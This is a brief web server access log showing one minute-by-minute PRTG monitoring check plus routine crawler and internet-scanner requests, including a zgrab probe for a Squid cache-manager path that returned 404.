87.121.84.130 - - [02/Jul/2025:11:48:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:11:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.14.32.6 - - [02/Jul/2025:11:49:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
212.91.247.32 - - [02/Jul/2025:11:49:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.70.5 - - [02/Jul/2025:11:50:14 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.247.32 - - [02/Jul/2025:11:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:51:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.7.213 - - [02/Jul/2025:11:52:48 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [02/Jul/2025:11:52:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:11:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:11:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:11:56:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:11:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
148.153.56.84 - - [02/Jul/2025:11:58:13 +0200] "GET /Iks5 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
